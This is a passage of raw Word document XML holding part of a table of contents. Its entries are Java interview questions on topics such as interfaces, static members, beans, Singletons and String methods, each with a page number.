              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307545 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CAEF337" w14:textId="50E6DC9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4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Abstract class and Interface? Explain with scenarios which one you will it be used with conditions?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307546 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EB53FCD" w14:textId="30E16A7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4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use of static and instance variables in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307547 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A5D6580" w14:textId="3CEA23D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4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will you access JNDI in java code?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307548 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C0BCB05" w14:textId="5885E55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4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y is the main method in java static?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307549 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B7871D5" w14:textId="2E75A43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5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use of the static keyword?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307550 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>118</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76B3CB52" w14:textId="5AC19F5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5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many ways can we create beans in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307551 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>120</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A8C0BE9" w14:textId="0B9B273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5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different types of calling beans?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307552 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19B1E50E" w14:textId="2757104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5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are the default methods?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307553 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58AD03C8" w14:textId="5E2683A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5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Can I add one more new default method in my child class? Does it give any problems with my existing classes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307554 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0076E441" w14:textId="618C82B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5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In Java, which class is the base class of all the classes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307555 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C1F47DC" w14:textId="3A44105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5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y is the equals method required?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307556 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0714B03F" w14:textId="690595E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5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Is it possible to have the same hashcode for multiple objects?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307557 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FBA2080" w14:textId="4441B57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5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nlist a few predefined interfaces from Java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307558 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="627DB081" w14:textId="56A45FA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5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If I have a 200 MB excel file so can java read that file?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307559 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>134</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AE9352F" w14:textId="516C9EF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6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immutability and mutability in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307560 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FAA0A44" w14:textId="4509EE2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6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Custom implementation of Singleton beans?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2958A367" w14:textId="36462EA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6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default scope of beans?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="488171F2" w14:textId="318C710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6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static and final?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>142</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28FD2E5A" w14:textId="5745264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6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about String class in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>143</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13E7F995" w14:textId="0B0DB4B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6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a special feature of String?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="455E7629" w14:textId="2669DF1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6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access Singleton class from another class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53E7E31A" w14:textId="6403F26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6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ere will the Singleton class be stored in memory?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>148</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02003EFB" w14:textId="35134E9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6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bucket level and segment level locking?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>149</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E7CD130" w14:textId="45307CD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6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is the static method bound with an object?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75720C82" w14:textId="25E2A92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7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use of the intern() method in String class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
